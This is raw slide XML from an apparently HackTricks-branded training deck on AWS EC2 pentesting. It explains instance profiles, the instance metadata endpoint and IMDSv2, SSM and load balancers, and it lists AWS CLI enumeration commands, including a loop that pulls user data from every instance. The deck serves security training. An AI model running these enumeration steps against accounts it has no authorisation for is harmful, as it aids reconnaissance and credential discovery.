          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="-155150" y="458550"/>
            <a:ext cx="4226401" cy="4226401"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="Google Shape;31;p6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3598350" y="19129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t/>
            </a:r>
            <a:endParaRPr sz="3780">
              <a:solidFill>
                <a:srgbClr val="72110C"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="990"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es" sz="2670">
                <a:solidFill>
                  <a:srgbClr val="72110C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>HackTricks Training</a:t>
            </a:r>
            <a:endParaRPr sz="2670">
              <a:solidFill>
                <a:srgbClr val="72110C"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
        <p:nvSpPr>
          <p:cNvPr id="3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0.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Instance Profiles</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Raleway ExtraBold"/>
              <a:ea typeface="Raleway ExtraBold"/>
              <a:cs typeface="Raleway ExtraBold"/>
              <a:sym typeface="Raleway ExtraBold"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="109" name="Google Shape;109;p15"/>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10" name="Google Shape;110;p15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="641200" y="1129050"/>
            <a:ext cx="8001000" cy="376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200">
                <a:solidFill>
                  <a:schemeClr val="lt2"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>AWS instance profiles are a feature of the Amazon Web Services (AWS) platform that provides a way to grant </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es" sz="1200" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>access to AWS resources from an EC2 instance</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="lt2"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>. Instance profiles are </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es" sz="1200" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>associated with an IAM role</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es" sz="1200">
                <a:solidFill>
                  <a:schemeClr val="lt2"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>, which defines the permissions to access AWS resources.</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200">
                <a:solidFill>
                  <a:schemeClr val="lt2"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>Instance profiles are needed because they allow EC2 instances to access AWS resources without the need for long-term access keys. Instead, the instance is assigned a role, and temporary credentials are generated for the role to access AWS resources. This reduces the risk of leaked credentials and helps to ensure that the principle of least privilege is followed, since the instance can only access the resources that are specified in the associated IAM role.</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200">
                <a:solidFill>
                  <a:schemeClr val="lt2"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>For example, an EC2 instance might need to access an S3 bucket to retrieve data or write logs, or it might need to access an RDS database to retrieve data or write records. The instance profile makes it possible to grant these permissions to the EC2 instance in a secure and manageable way, without the need to store long-term credentials on the instance.</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:solidFill>
                <a:schemeClr val="lt2"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="111" name="Google Shape;111;p15"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="4835900"/>
            <a:ext cx="75267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https://cloud.hacktricks.xyz/pentesting-cloud/aws-pentesting/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum#ebs</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1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Metadata</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Raleway ExtraBold"/>
              <a:ea typeface="Raleway ExtraBold"/>
              <a:cs typeface="Raleway ExtraBold"/>
              <a:sym typeface="Raleway ExtraBold"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="117" name="Google Shape;117;p16"/>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18" name="Google Shape;118;p16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="384500" y="1119550"/>
            <a:ext cx="8001000" cy="366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AWS EC2 metadata is information about an Amazon Elastic Compute Cloud (EC2) instance that is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es" sz="1100" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>available to the instance at runtime</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="lt2"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>. This metadata is used to provide information about the instance, such as its instance ID, the availability zone it is running in, the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es" sz="1100" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>IAM role associated with the instance</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="lt2"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>, and the instance's hostname.</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Accessible in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es" sz="1100" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>http://169.254.169.254</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="lt2"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>.</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There are 2 versions, the second version requires obtaining a token using the PUT verb to contact metadata endpoints and obtain information.</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100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>UPDATE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="lt2"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>: Note that if the EC2 instance is enforcing IMDSv2,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="lt2"/>
                </a:solidFill>
                <a:uFill>
                  <a:noFill/>
                </a:uFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
                <a:hlinkClick r:id="rId3">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es" sz="1100" u="sng">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
                <a:hlinkClick r:id="rId4">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>according to the docs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="lt2"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>, the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>response of the PUT request will have a hop limit of 1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="lt2"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>, making impossible to access the EC2 metadata from a container inside the EC2 instance.</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Moreover, IMDSv2 will also </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>block requests to fetch a token that include the X-Forwarded-For header</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es" sz="1100">
                <a:solidFill>
                  <a:schemeClr val="lt2"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>. This is to prevent misconfigured reverse proxies from being able to access it.</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For complete information about which info you can obtain from the metadata endpoint check </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es" sz="1100" u="sng">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
                <a:hlinkClick r:id="rId5">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf</a:t>
            </a:r>
            <a:endParaRPr sz="1100">
              <a:solidFill>
                <a:schemeClr val="accent4"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
        <p:nvSpPr>
          <p:cNvPr id="119"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SSM</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Raleway ExtraBold"/>
              <a:ea typeface="Raleway ExtraBold"/>
              <a:cs typeface="Raleway ExtraBold"/>
              <a:sym typeface="Raleway ExtraBold"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="124" name="Google Shape;124;p17"/>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25" name="Google Shape;125;p17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="1110050"/>
            <a:ext cx="8001000" cy="268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s" sz="1300">
                <a:solidFill>
                  <a:schemeClr val="lt2"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>Amazon Simple Systems Manager (SSM) allows to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es" sz="1300" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>remotely manage floats</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es" sz="1300">
                <a:solidFill>
                  <a:schemeClr val="lt2"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t> of EC2 instances to make their administrations much easier. Each of these instances need to be running the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es" sz="1300" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>SSM Agent service</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es" sz="1300">
                <a:solidFill>
                  <a:schemeClr val="lt2"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>, as the service will be the one getting the actions and performing them from the AWS API.</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r>
              <a:rPr lang="es" sz="1300">
                <a:solidFill>
                  <a:schemeClr val="lt2"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>SSM Agent makes it possible for Systems Manager to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es" sz="1300" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>update, manage, and configure</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es" sz="1300">
                <a:solidFill>
                  <a:schemeClr val="lt2"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t> these resources. The agent processes requests from the Systems Manager service in the AWS Cloud, and then runs them as specified in the request.</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300">
                <a:solidFill>
                  <a:schemeClr val="lt2"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>The SSM Agent comes </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es" sz="1300" u="sng">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
                <a:hlinkClick r:id="rId3">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>preinstalled in some AMIs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es" sz="1300">
                <a:solidFill>
                  <a:schemeClr val="lt2"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t> or you need to</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es" sz="1300">
                <a:solidFill>
                  <a:schemeClr val="lt2"/>
                </a:solidFill>
                <a:uFill>
                  <a:noFill/>
                </a:uFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
                <a:hlinkClick r:id="rId4">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es" sz="1300" u="sng">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
                <a:hlinkClick r:id="rId5">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>manually install them</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es" sz="1300">
                <a:solidFill>
                  <a:schemeClr val="lt2"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t> on the instances. Also, the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es" sz="1300" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>IAM Role used inside the instance</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es" sz="1300">
                <a:solidFill>
                  <a:schemeClr val="lt2"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t> needs to have the policy AmazonEC2RoleforSSM attached to be able to communicate.</a:t>
            </a:r>
            <a:endParaRPr sz="1300">
              <a:solidFill>
                <a:schemeClr val="lt2"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="126" name="Google Shape;126;p17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="4835900"/>
            <a:ext cx="76050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https://cloud.hacktricks.xyz/pentesting-cloud/aws-pentesting/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum#ssm</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27"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ELB - Elastic Load Balancer</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Raleway ExtraBold"/>
              <a:ea typeface="Raleway ExtraBold"/>
              <a:cs typeface="Raleway ExtraBold"/>
              <a:sym typeface="Raleway ExtraBold"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="132" name="Google Shape;132;p18"/>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33" name="Google Shape;133;p18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="374975" y="1017725"/>
            <a:ext cx="80010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lt2"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>Elastic Load Balancing (ELB) is a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es" sz="1300" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>load-balancing service</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es" sz="1300">
                <a:solidFill>
                  <a:schemeClr val="lt2"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t> for Amazon Web Services (AWS) deployments. ELB automatically distributes incoming application traffic and scales resources to meet traffic demands.</a:t>
            </a:r>
            <a:endParaRPr sz="1300">
              <a:solidFill>
                <a:schemeClr val="lt2"/>
              </a:solidFill>
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="134" name="Google Shape;134;p18"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2312075" y="1766175"/>
            <a:ext cx="4578849" cy="3145925"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="135" name="Google Shape;135;p18"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="914400" y="4835900"/>
            <a:ext cx="91929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https://cloud.hacktricks.xyz/pentesting-cloud/aws-pentesting/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum#ebs</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3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4.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Manual Enumeration</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Raleway ExtraBold"/>
              <a:ea typeface="Raleway ExtraBold"/>
              <a:cs typeface="Raleway ExtraBold"/>
              <a:sym typeface="Raleway ExtraBold"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="141" name="Google Shape;141;p19"/>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42" name="Google Shape;142;p19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="641200" y="595650"/>
            <a:ext cx="80010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 Get EC2 instances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aws ec2 describe-instances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aws ec2 describe-instance-status #Get status from running instances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 Get user data from each ec2 instance</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for instanceid in $(aws ec2 describe-instances | grep -Eo '"i-[a-zA-Z0-9]+' | tr -d '"'); do</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aws ec2 describe-instance-attribute --instance-id "$instanceid" --attribute userData</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done</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 Instance profiles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aws iam list-instance-profiles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Clr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>aws iam list-instance-profiles-for-role --role-name &lt;name&gt;</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 Get SSH Key Pairs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ec2 describe-key-pairs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 Get VPCs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ec2 describe-vpcs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ec2 describe-vpc-peering-connections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 Get subnetworks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ec2 describe-subnets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 Get security groups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ec2 describe-security-groups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 Get FW rules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ec2 describe-network-acls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 SSM</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ssm describe-instance-information</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ssm describe-parameters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 ELBs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elb describe-load-balancers</a:t>
            </a:r>
            <a:endParaRPr sz="1000">
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es" sz="1000">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>aws elbv2 describe-load-balancers</a:t>
            </a:r>
            <a:endParaRPr sz="1000">
              <a:solidFill>
                <a:schemeClr val="accent2"/>
              </a:solidFill>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="143" name="Google Shape;143;p19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="914400" y="4866050"/>
            <a:ext cx="80460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https://cloud.hacktricks.xyz/pentesting-cloud/aws-pentesting/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum#ebs</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44"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5.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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es"/>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es">
